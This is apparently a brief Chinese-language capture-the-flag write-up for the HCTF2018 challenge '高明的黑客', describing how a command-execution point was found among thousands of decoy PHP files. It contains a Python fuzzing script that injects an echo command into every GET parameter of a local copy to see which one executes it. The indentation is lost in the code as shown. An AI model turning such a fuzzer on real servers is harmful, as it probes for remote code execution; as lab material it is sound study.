高明的黑客

HCTF2018

一开始就给了源码40M的压缩包,几千个php
一开始以为是要找正确的php,找了一会没找到.
给的php里面也有执行,上传估计就是fuzz找正确的命令执行点了.
用python找到get和post传命令,看那个正确回显了.
这里就贴师傅的脚本了,(自己写了100多行的多进程,跑了半个小时还没出来,师傅20行8分钟)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import requests
import re
import os
from time import sleep

flies = os.listdir('/var/www/html/src')
for i in flies:
url = 'http://127.0.0.1/src/'+i
f = open('/var/www/html/src/'+i)
bb = f.read()
f.close()
rr = re.compile(r'(?<=_GET\[\').*(?=\'\])')
aa = rr.findall(bb)
for c in aa:
payload = url + '/?' + c + '=echo "get it";'

req=requests.get(payload)
if 'get it' in req.content:
print payload
exit();

最后是xk0SzyKwfzw.php的get参数Efa5BVG